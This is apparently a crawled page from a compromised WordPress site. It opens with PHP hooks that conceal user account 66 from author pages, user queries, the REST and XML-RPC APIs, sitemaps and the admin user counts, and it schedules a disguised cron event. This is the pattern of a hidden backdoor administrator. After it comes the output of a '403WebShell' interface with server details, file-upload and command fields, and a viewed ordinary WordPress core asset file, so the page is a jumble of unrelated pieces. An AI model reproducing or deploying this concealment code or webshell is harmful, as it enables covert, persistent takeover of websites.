add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/biotraubensaft/wp-includes/assets/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/biotraubensaft/wp-includes/assets/script-modules-packages.php
<?php return array(
	'a11y/index.js' => array(
		'dependencies' => array(
			
		),
		'version' => '1c371cb517a97cdbcb9f'
	),
	'abilities/index.js' => array(
		'dependencies' => array(
			'wp-data',
			'wp-i18n'
		),
		'version' => 'f3475bc77a30dcc5b38d'
	),
	'block-editor/utils/fit-text-frontend.js' => array(
		'dependencies' => array(
			
		),
		'module_dependencies' => array(
			array(
				'id' => '@wordpress/interactivity',
				'import' => 'static'
			)
		),
		'version' => '383c7a8bd24a1f2fd9b9'
	),
	'block-library/accordion/view.js' => array(
		'dependencies' => array(
			
		),
		'module_dependencies' => array(
			array(
				'id' => '@wordpress/interactivity',
				'import' => 'static'
			)
		),
		'version' => '2af01b43d30739c3fb8d'
	),
	'block-library/file/view.js' => array(
		'dependencies' => array(
			
		),
		'module_dependencies' => array(
			array(
				'id' => '@wordpress/interactivity',
				'import' => 'static'
			)
		),
		'version' => '7d4d261d10dca47ebecb'
	),
	'block-library/form/view.js' => array(
		'dependencies' => array(
			
		),
		'version' => '5542f8ad251fe43ef09e'
	),
	'block-library/image/view.js' => array(
		'dependencies' => array(
			
		),
		'module_dependencies' => array(
			array(
				'id' => '@wordpress/interactivity',
				'import' => 'static'
			)
		),
		'version' => '25ee935fd6c67371d0f3'
	),
	'block-library/navigation/view.js' => array(
		'dependencies' => array(
			
		),
		'module_dependencies' => array(
			array(
				'id' => '@wordpress/interactivity',
				'import' => 'static'
			)
		),
		'version' => '96a846e1d7b789c39ab9'
	),
	'block-library/playlist/view.js' => array(
		'dependencies' => array(
			
		),
		'module_dependencies' => array(
			array(
				'id' => '@wordpress/interactivity',
				'import' => 'static'
			)
		),
		'version' => '99f747d731f80246db11'
	),
	'block-library/query/view.js' => array(
		'dependencies' => array(
			
		),
		'module_dependencies' => array(
			array(
				'id' => '@wordpress/interactivity',
				'import' => 'static'
			),
			array(
				'id' => '@wordpress/interactivity-router',
				'import' => 'dynamic'
			)
		),
		'version' => '7a4ec5bfb61a7137cf4b'
	),
	'block-library/search/view.js' => array(
		'dependencies' => array(
			
		),
		'module_dependencies' => array(
			array(
				'id' => '@wordpress/interactivity',
				'import' => 'static'
			)
		),
		'version' => '38bd0e230eaffa354d2a'
	),
	'block-library/tabs/view.js' => array(
		'dependencies' => array(
			
		),
		'module_dependencies' => array(
			array(
				'id' => '@wordpress/interactivity',
				'import' => 'static'
			)
		),
		'version' => '1f60dd5e3fa56c6b2e2e'
	),
	'boot/index.js' => array(
		'dependencies' => array(
			'react',
			'react-dom',
			'react-jsx-runtime',
			'wp-commands',
			'wp-components',
			'wp-compose',
			'wp-core-data',
			'wp-data',
			'wp-editor',
			'wp-element',
			'wp-html-entities',
			'wp-i18n',
			'wp-keyboard-shortcuts',
			'wp-keycodes',
			'wp-notices',
			'wp-primitives',
			'wp-private-apis',
			'wp-theme',
			'wp-url'
		),
		'module_dependencies' => array(
			array(
				'id' => '@wordpress/a11y',
				'import' => 'static'
			),
			array(
				'id' => '@wordpress/lazy-editor',
				'import' => 'dynamic'
			),
			array(
				'id' => '@wordpress/route',
				'import' => 'static'
			)
		),
		'version' => '54bb5a420026a61c7e4f'
	),
	'connectors/index.js' => array(
		'dependencies' => array(
			'react-jsx-runtime',
			'wp-components',
			'wp-data',
			'wp-element',
			'wp-i18n',
			'wp-private-apis'
		),
		'version' => '274797868955a828dfdc'
	),
	'core-abilities/index.js' => array(
		'dependencies' => array(
			'wp-api-fetch',
			'wp-url'
		),
		'module_dependencies' => array(
			array(
				'id' => '@wordpress/abilities',
				'import' => 'static'
			)
		),
		'version' => '012760fd849397dd0031'
	),
	'edit-site-init/index.js' => array(
		'dependencies' => array(
			'react-jsx-runtime',
			'wp-data',
			'wp-element',
			'wp-primitives'
		),
		'module_dependencies' => array(
			array(
				'id' => '@wordpress/boot',
				'import' => 'static'
			)
		),
		'version' => 'e57f44d1a9f69e75d2d9'
	),
	'interactivity/index.js' => array(
		'dependencies' => array(
			
		),
		'version' => 'efaa5193bbad9c60ffd1'
	),
	'interactivity-router/full-page.js' => array(
		'dependencies' => array(
			
		),
		'module_dependencies' => array(
			array(
				'id' => '@wordpress/interactivity-router',
				'import' => 'dynamic'
			)
		),
		'version' => '5c07cd7a12ae073c5241'
	),
	'interactivity-router/index.js' => array(
		'dependencies' => array(
			
		),
		'module_dependencies' => array(
			array(
				'id' => '@wordpress/a11y',
				'import' => 'dynamic'
			),
			array(
				'id' => '@wordpress/interactivity',
				'import' => 'static'
			)
		),
		'version' => '71aa17bac91628a0f874'
	),
	'latex-to-mathml/index.js' => array(
		'dependencies' => array(
			
		),
		'version' => 'e5fd3ae6d2c3b6e669da'
	),
	'latex-to-mathml/loader.js' => array(
		'dependencies' => array(
			
		),
		'module_dependencies' => array(
			array(
				'id' => '@wordpress/latex-to-mathml',
				'import' => 'dynamic'
			)
		),
		'version' => '4f37456af539bd3d2351'
	),
	'lazy-editor/index.js' => array(
		'dependencies' => array(
			'react-jsx-runtime',
			'wp-block-editor',
			'wp-blocks',
			'wp-components',
			'wp-core-data',
			'wp-data',
			'wp-editor',
			'wp-element',
			'wp-i18n',
			'wp-private-apis',
			'wp-style-engine'
		),
		'version' => '30ab62f45bfe9f971ea0'
	),
	'route/index.js' => array(
		'dependencies' => array(
			'react',
			'react-dom',
			'react-jsx-runtime',
			'wp-private-apis'
		),
		'version' => 'c5843b6c5e84b352f43b'
	),
	'workflow/index.js' => array(
		'dependencies' => array(
			'react',
			'react-dom',
			'react-jsx-runtime',
			'wp-components',
			'wp-data',
			'wp-element',
			'wp-i18n',
			'wp-keyboard-shortcuts',
			'wp-primitives',
			'wp-private-apis'
		),
		'module_dependencies' => array(
			array(
				'id' => '@wordpress/abilities',
				'import' => 'static'
			)
		),
		'version' => '13556bc597bbf2a8d620'
	)
);

Youez - 2016 - github.com/yon3zu
LinuXploit